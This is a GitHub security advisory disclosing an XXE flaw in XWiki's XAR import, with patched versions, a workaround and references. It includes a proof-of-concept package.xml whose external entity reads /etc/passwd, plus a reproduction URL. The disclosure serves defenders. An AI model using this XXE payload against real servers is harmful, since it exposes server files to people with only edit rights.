GHSA-gx4f-976g-7g6v

### Impact
Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.

Example to reproduce:
* Create a forget XAR file and inside it, have the following `package.xml` content:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
...
```
* Upload it onto a wiki page (e.g. `XXE`) as an attachment (e.g. `test.xar`).
* Call the page using `http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar`

You'll then notice that the displayed UI contains the content of the `/etc/passwd` file.

### Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.

### Workarounds
You'd need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the `XarPackage` java class and then copy the modified version to your `WEB-INF/classes` directory (or rebuild the `xwiki-platform-xar-model` maven module and replace the one found in `WEB-INF/lib/`).

### References
* https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434
* https://jira.xwiki.org/browse/XWIKI-20320

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])